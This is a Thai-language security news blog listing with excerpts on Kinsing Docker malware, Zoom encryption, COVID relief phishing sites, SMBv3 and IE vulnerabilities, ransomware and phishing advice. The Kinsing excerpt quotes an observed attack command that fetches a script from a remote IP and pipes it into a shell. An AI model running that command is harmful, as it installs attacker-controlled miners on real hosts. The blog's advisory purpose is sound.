พบ “Kinsing” มัลแวร์สายขุดเหมืองบนDocker มีอัตราการแพร่กระจาย 1,000 พอร์ต/วัน

ขณะนี้ผู้ให้บริการคลาวด์คอนเทนเนอร์อย่าง Docker กำลังประสบปัญหาจาก “Kinsing” มัลแวร์แบบแพร่กระจายตัวเองที่อาศัยช่องโหว่จากการตั้งค่า Docker Daemon API ที่มีการเปิดพอร์ตสาธารณะไว้ โดยมีเป้าหมายในการโจมตีสูงถึง 1,000 คอนเทนเนอร์ต่อวัน รูปแบบการโจมตีเริ่มจากการที่ผู้โจมตีค้นหา Docker API ที่มีการเปิดพอร์ตสาธารณะไว้ แล้วทำการเชื่อมต่อเข้ากับพอร์ตดังกล่าว ก่อนที่จะทำการรัน Rogue Ubuntu container เพื่อเรียกใช้ “Kinsing” ให้ไปดาวน์โหลดคริปโตไมเนอร์มารันบนเครื่องเป้าหมาย จากนั้นจะทำการแพร่กระจายตัวเองไปยังคอนเทนเนอร์และโฮสต์อื่นๆ ต่อไป คำสั่งที่มักจะพบในการโจมตีคือ “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh | sh;tail -f /dev/null.” เพื่ออัพเดท Docker…
Read More

Zoom ยอมรับไม่ได้เข้ารหัส end-to-end จริงอย่างที่โฆษณา แต่ใช้แค่ TCP/UDP

อย่างไรก็ตามเมื่อ The Intercept สอบถามไปยัง Zoom เรื่องการเชื่อมต่อแบบ end-to-end ก็ได้คำตอบกลับมาว่าตอนนี้ยังทำไม่ได้ Zoom ใช้แค่ TCP ร่วมกับ UDP เท่านั้น เท่ากับว่า Zoom ยังสามารถเข้าถึงข้อมูลและวิดีโอผู้ใช้งานได้อยู่ ซึ่งอาจส่งผลถึงกรณีที่รัฐบาลขอข้อมูลผู้ใช้งานจาก Zoom แบบเดียวกับที่ Google, Facebook และ Microsoft โดน (แต่บริษัทเหล่านั้นมีการออกรายงาน transparency report) Zoom ให้เหตุผลว่าที่ใช้คำว่า ‘end to end’ เพราะการเชื่อมต่อระหว่างปลายทาง (endpoint) ที่เป็น Zoom นั้นถูกเข้ารหัส (‘connection being encrypted from Zoom end point to Zoom end point‘) หรือกล่าวอีกอย่างคือ…
Read More

ระวัง 44 เวบปลอมชื่อคล้าย “เราไม่ทิ้งกัน” หลอกให้ไปลงทะเบียนรับเงิน 5000 แต่จริงๆ แอบขโมยข้อมูล

นอกจากปัญหาที่คนอาจจะสับสนพยายามไปลงทะเบียนรับเงินเยียวยาที่ธนาคารแล้ว ตอนนี้เหมือนจะมีอีกหนึ่งปัญหาใหม่ของการลงทะเบียนรับเงินเยียวยาซะแล้ว เมื่อธนาคารกรุงไทยพบว่ามีเวบที่ชื่อคล้ายกับ “เราไม่ทิ้งกัน” เปิดขึ้นมามากถึง 44 เวบไซต์ คาดอาจจะสร้างความสับสนในการเข้าไปลงทะเบียน นอกจากจะไม่ได้รับเงินเยียวยาแล้ว ยังเสี่ยงโดนขโมยข้อมูลไปอีก เวบไซต์ www.เราไม่ทิ้งกัน.com นั้นจัดตั้งโดยธนาคารกรุงไทยขึ้นมาเพื่อให้แรงงานที่ประสบปัญหาขาดรายได้ในช่วงระบาด COVID-19 เข้ามารับเงืนเยียวยา แต่ทางแผนก IT Security ของธนาคารกลับพบว่ามีเวบไซต์ที่ชื่อคล้ายกันได้จดทะเบียนเข้ามามากมายถึง 44 เวบไซต์ และอาจจะใช้วิธีการ Web Phising หลอกให้คลิกเข้าไปเพื่อกรอกข้อมูลต่างๆ ด้วยการอาศัยชื่อที่คล้ายกัน แต่เปลี่ยนแปลงรายละเอียดบางส่วน เช่นใช้ .net, .org, .co.th แทนเวบไซต์ของจริงที่ใช้เป็น .com รวมถึงการสะกดที่ใกล้เคียงกันอย่าง “เราไม่ทิ่งกัน”, “เราไม่ทิงกัน” จึงได้ทำการแจ้งไปยังกระทรวงดิจิทัลเพื่อเศรษฐกิจและสังคม (ดีอีเอส) ทำการตรวจสอบและจัดการต่อไป ที่มา: https://droidsans.com/fake-covid-relief-5000-baht-web-phishing/
Read More

10 เคล็ดลับความมั่นคงปลอดภัยในสถานะการที่คุณต้องทำงานที่บ้าน

ในเวลานี้กระแสของเชื้อไวรัส COVID-19 นั้นส่งผลกระทบในวงกว้างในประเทศไทย และทั่วโลก ทำให้บริษัทหรือหน่วยงานต่างๆตื่นตัวในการเริ่มมีแนวคิดที่จะดำเนินการทำงานที่บ้านมากขึ้น ทางทีมจึงขอนำเสนอ 10 เคล็ดลับที่จะทำให้องค์กรของท่านปลอดภัยทั้งทางโลกไซเบอร์และตัวท่านเอง ดังต่อไปนี้ 1.ทำให้พนักงานเริ่มต้นทำงานที่บ้านได้ง่าย ในการทำงานที่บ้านต้องมีการตั้งค่าอุปกรณ์และเชื่อมต่อบริการต่างๆของหน่วยงาน อย่างเช่น E-Mail, Internal Service หรือ Sales Force เป็นต้น โดยเพิ่มโซลูชัน Self Service Portal (SSP) ที่ช่วยให้พนักงานสามารถตั้งค่าทุกอย่างได้ด้วยตนเอง และยังช่วยลดภาระของฝ่าย IT ได้อีกด้วย 2.ตรวจสอบให้มั้นใจว่าอุปกรณ์และระบบของท่านได้รับการป้องกันที่ดีพอ ดำเนินการตรวจสอบให้แน่ใจว่าอุปกรณ์ต่างๆ รวมถึงระบบต่างๆ ได้มีการอัพเดทแพตช์ให้เป็นปัจจุบัน เนื่องจากมัลแวร์ส่วนใหญ่นั้นอาศัยช่องโหว่จากการที่ผู้ใช้งานนั้นไม่ดำเนินการอัพเดทแพตซ์โจมตีได้ 3.มีการเข้ารหัสอุปกรณ์ เมื่อมีการนำอุปกรณ์ออกจากสำนักงานมักจะมีความเสี่ยงมากขึ้นเนื่องจากเสี่ยงต่อการสูญหายหรือโดนขโมย ควรมีการใช่เครื่อมมือเสริมในการช่วยเข้ารหัสเช่น BitLocker หรือ FileVault เป็นต้น 4.สร้างการเชื่อมต่อที่ปลอดภัยกลับไปยังหน่วยงาน มีการใช้ Virtual Private Network (VPN) ช่วยในการทำให้แน่ใจว่าข้อมูลทั้งหมดที่โอนระหว่างพนักงานกับเครือข่ายองค์กรนั้นมีการเข้ารหัสและมีการป้องกันในระหว่างถ่ายโอน รวมถึงไม่ถูกเปลี่ยนแปลง 5.มีการเพิ่มระดับการป้องกันเพื่อความปลอดภัยของอีเมล เนื่องจากการทำงานที่บ้านนั้นส่วนใหญ่จะมีการติดต่อผ่านทางอีเมลเป็นส่วนใหญ่…
Read More

พบช่องโหว่ร้ายแรงของ SMBv3 ไร้การอัพเดท

ช่องโหว่นี้เกิดจากข้อผิดพลาดเมื่อ SMBv3 (CVE-2020-0796) มีการจัดการแพ็คเก็ตข้อมูลข้อมูลที่ถูกบีบอัดที่ออกแบบมาเพื่อประสงค์ร้ายและอนุญาติให้มีการเชื่อมต่อระยะไกลได้ ผู้โจมตีสามารถใช้ประโยชน์จากมันเพื่อเรียกใช้รหัสได้ตามอำเภอใจ โดยช่องโหว่นี้ยังไม่มีการประกาศจาก Microsoft และไม่มีการออกประกาศอัพเดท ผลกระทบ Windows 10 version 1903, Windows Server version 1903, Windows 10 version 1909, Windows Server version 1909, คำแนะนำ ปิดการใช้งาน SMBv3 ถ้าไม่จำเป็น โดยสามารถใช้คำสั่งดังต่อไปนี้เพื่อปิดการใช้งาน Set-ItemProperty-Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 -Force ดำเนินการ Block Port TCP 445 จากเครื่อง Client และ Firewall ที่มา: https://www.bleepingcomputer.com/news/security/microsoft-leaks-info-on-wormable-windows-smbv3-cve-2020-0796-flaw/
Read More

พบการโจมตี Phishing ในรูปแบบใหม่ จากการตอบของระบบ Chatbot อัตโนมัติ

Malware Hunter Team พบการโจมตีรูปแบบใหม่ ในการหลอกเหยื่อด้วยแชทบอท ใช้เหยื่อกรอกแบบฟอร์มต่าง หนึ่งในข้อมูลที่หลอกลวงคือบัตรเครดิตและข้อมูลบัญชีธนาคาร หลังจากเหยื่อได้มีการทำรายการเสร็จเรียบร้อยแล้ว ระบบจะตอบกลับมาว่าพบสิ่งผิดปกติเกิดขึ้นว่าไม่พบข้อมูล จากนั้นขอให้ผู้เสียหายส่งข้อมูลอีกครั้งเพื่อเป็นการยืนยันข้อมูลว่าเหยื่อได้กรอกข้อมูลที่ถูกต้องกลับมา คำแนะนำ : ควรตรวจสอบ URL เว็บไซต์ว่าเป็นเว็บไซต์ที่ถูกต้อง และหากว่าระบบมีการตอบกลับมาว่าคุณมีเงินได้คืน ควรโทรไปตรวจสอบกับผู้ให้บริการเพื่อเป็นการยืนยันอีกทางหนึ่ง ที่มา: https://www.bleepingcomputer.com/news/security/intricate-phishing-scam-uses-support-chatbot-to-assist-victims/
Read More

5 ข้อคิดในการป้องกัน Phishing SMS

ข้อที่ 1 : ไม่กระทำใดๆต่อ เมื่อได้รับ SMS           คำเตือนสำคัญที่สุดในข้อแรกคือ ข้อความที่คุณได้รับจากข้อความ SMS คือการที่จะจูงใจให้คุณกระทำการคลิก link, โทรกลับหรือส่งข้อความตอบกลับไปยังหมายเลขต้นทาง ก็ตามขอให้คุณฉุกคิดพิจารณาในทันทีว่าอาจเป็นข้อความหลอกลวง ข้อที่ 2 : สังเกตุข้อความที่ได้รับ           ข้อความ SMS ส่วนใหญ่นั้นถูกดำเนินการส่งจากระบบอัตโนมัติ ไม่ว่าจะเป็นธุรกรรมใดๆก็ตาม ขอให้คุณสังเกตุจากข้อความที่คุณเคยได้รับมา แล้วนำมาเปรียบเทียบกับข้อความที่พึ่งได้รับมาว่ามีความแตกต่างกันอย่างไร เช่น           ข้อความเก่าที่ได้รับมา “รหัสในการยืนยันแอพ ShopABC คือ 252312. มีอายุใช้งาน 15 นาที โปรดอย่าแชร์รหัสนี้ให้แก่ผู้อื่นไม่ว่ากรณีใดๆ”           ข้อความใหม่ที่ได้รับมา “รหัสในการยืนยันแอพ ShopABC คือ 111222. มีอายุใช้งาน 15 นาที โปรดอย่าแชร์รหัสนี้ให้แก่ผู้อื่นไม่ว่ากรณีใดๆ สามารถเข้าดำเนินการยืนยันได้ที่ www.shop-abc.com /comfirm-regis”           ข้อสังเกตุ :ในหลายๆ Application นั้นจะมีการส่งรหัสมายืนยันตาม SMS ของท่านนั่นเป็นเรื่องจริง แต่ทุกครั้งจะให้มีการยืนยันโดยการนำรหัสเข้าไปใส่ผ่านหน้าตัว Mobile App เท่านั้น จะไม่มีการกด link เพื่อเข้าไปยืนยันตัวตน  หรือถ้ามีก็อาจจะน้อยมาก ควรสังเกตุในข้อนี้ด้วย ข้อที่ 3 : ให้ความสนใจกับรายละเอียดของข้อความ           ถึงแม้ว่าข้อความนั้นมี URL ที่น่าเชื่อถือว่าอาจจะเป็นเว็บไซต์ที่สามารถน่าเชื่อถือได้ อย่างที่บอกไปตามข้อที่ 1 ก็ไม่ควรที่จะดำเนินการคลิกเข้าไป ถ้าหากดำเนินการคลิกเข้าไป ควรดำเนินการตรวจสอบให้แน่ชัดว่าเป็น URL ดังที่ได้รับข้อความมาหรือไม่ และเป็น URL ของบริษัทนั้นๆจริงหรือไม่ ข้อที่ 4 : ข้อความที่ได้รับอาจทำให้คุณด่วนการตัดสินใจ           มีบางเหตุการณ์ที่คุณอาจจะได้รับข้อความบางอย่างเพื่อให้คุณตัดสินใจกระทำการเข้าไปยืนยันตัวตนได้โดยง่าย เพียงแค่มันเป็นตัวอักษรที่สื่อถึงทำให้คุณต้องรีบกระทำ ดังตัวอย่าง “ภายในเวลา xx นาที มิเช่นการบริการของคุณจะถูกยกเลิก” ข้อความเหล่านี้เป็นแรงจูงใจในการของผู้โจมตี คุณควรตรวจสอบให้แน่ใจ โดยการติดต่อกลับไปยังหน่วยงานนั้นๆ ให้ได้รับการยืนยันจากทางเจ้าหน้าที่ว่าคุณต้องมีการยืนยันอะไรบางอย่าง จริงหรือไม่ ข้อที่…
Read More

Microsoft แจ้งเตือนช่องโหว่ IE Browser

 ถึงแม้ว่า   Internet Explorer Browser (IE) นั้นจะได้ถูกแทนที่ด้วย Microsoft Edge Browser แล้วก็ตาม แต่ IE นั้นยังไม่หายไปจากเครื่องของคุณ ซึ่งเหล่า Hackerนั้นจึงได้ทำการโจมตีผ่านช่องโหว่ของ browser  ตัวนี้เพื่อเข้าควบคุมเครื่องของคุณจากระยะไกลได้ โดยมีการเขียน Script “JScript.dll” หมายเลข CVE อ้างอิง “CVE-2020-0674” หลังจาก Hacker   ได้ทำการยึดเครื่องของคุณได้สามารถทำทุกการกระทำได้เสมือนกับว่าเป็น User ที่ใช้งานได้ตามปกติ ผลกระทบ : Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11 บน Windows 10, Windows 8.1 รวมถึง Windows 7 ที่หยุดการพัฒนาแล้วก็ตาม คำแนะนำ : การแก้ปัญหาเบื้องต้นก่อนมีการ Patch แก้ไขช่องโหว่ ดำเนินการป้องกันการ Download Jscript.dll จำกัดสิทธิ์ในการเรียกใช้ไฟล์ Jscript.dll โดยใช้สิทธิ์ของ Administrator เท่านั้น (หมายเหตุ : หากผู้โจมตีสามารถยกระดับสิทธิ์เป็น Administrator ได้การทำวิธีนี้จึงไม่ปลอดภัย) การแก้ไขสำหรับ Windows 32-bit ก่อนมีการ Patch ช่องโหว่นี้ takeown / f% windir% \ syswow64 \ jscript.dll cacls% windir% \ syswow64 \ jscript.dll / E / P everyone: N takeown / f% windir% \…
Read More

Ako Ransomware ไฟล์ร้ายที่แฝงมาในรูปของ E-Mail

Ako Ransomware เป็น Ransomware ที่มีรูปแบบการโจมตีโดยการแนบไฟล์ Malware ผ่านช่องทาง   E-mail โดยมีการแนบไฟล์ “agreement.zip” พร้อมส่งรหัสผ่าน “2020” เอาไว้ให้ในข้อความ เพื่อเพิ่มความน่าเชื่อถือ ถ้าผู้ที่ได้รับ E-mail ทำการ Extract ไฟล์ออกมาจะพบไฟล์ที่ชื่อว่า agreement.scr เมื่อเรียกใช้งานจะทำการติดตั้ง ransomware มันจะเข้ารหัสไฟล์ของเหยื่อและทิ้งไฟล์ที่แจ้งรายละเอียดการเรียกค่าไถ่ชื่อ “ako-readme.txt” เอาไว้ คำแนะนำ : ควรมีการฝึกอบรมให้ความรู้แก่พนักงานด้าน cyber security awareness ควรมีอุปกรณ์ป้องกัน อย่างเช่น E-mail Gateways และ Antivirus ที่มา : https://www.bleepingcomputer.com/news/security/ako-ransomware-uses-spam-to-infect-its-victims/
Read More

ช่องโหว่บน Zero-Day บน Dropbox สามารถแก้ไขได้แล้วแม้ยังไม่ออก patch ใหม่

ช่องโหว่บน Zero – Day ของ Dropobox สำหรับ Windows นั้นจะส่งผลให้ผู้โจมตีได้รับสิทธิ์ที่มีการสงวนไว้ในระบบ ซึ่งเป็นบัญชีที่มีสิทธิพิเศษที่สุดในระบบปฏิบัติการ นักวิจัยด้านความปลอดภัยนาม Decoder และ Chris Danieli เป็นผู้ค้นพบช่องโหว่และสร้าง proof-of-concept exploit code  เพื่อพิสูจน์ความถูกต้องของผลการวิจัย พวกเขาบอกว่าพวกเขาแจ้ง Dropbox เกี่ยวกับปัญหาเมื่อวันที่ 18 กันยายนและอนุญาตให้ใช้ระยะเวลา 90 วันก่อนที่จะทำการเปิดเผยต่อสาธารณะ  ในตอนนี้จนกว่า Dropbox จะมีการออกเวอร์ชั่นปรับปรุงเพื่อแก้ไขปัญหาที่เกิดขึ้น โดยตอนนี้สามารถใช้ 0Patch ซึ่งเป็นแพลตฟอร์มที่ส่งมอบ micropatches สำหรับปัญหาที่ทราบก่อนที่จะมีการแก้ไขอย่างเป็นทางการถาวร โค้ดเล็ก ๆ เหล่านี้แก้ไขเฉพาะส่วนที่มีช่องโหว่และถูกนำไปใช้ในหน่วยความจำขณะที่ระบบกำลังทำงานดังนั้นจึงสามารถทำงานได้ปกติโดยไม่ต้องรีบูตเครื่อง นักวิจัยกล่าวว่าพวกเขาทดสอบช่องโหว่การเพิ่มระดับสิทธิพิเศษในเวอร์ชัน 87.4.138 ของซอฟต์แวร์ซึ่งเป็นรุ่นล่าสุดในขณะที่เริ่มทดสอบ นักวิจัยทั้งสองพบว่า’dropboxupdate’ service  เขียนไฟล์logไปยัง ‘C: \ ProgramData \ Dropbox \ Update…
Read More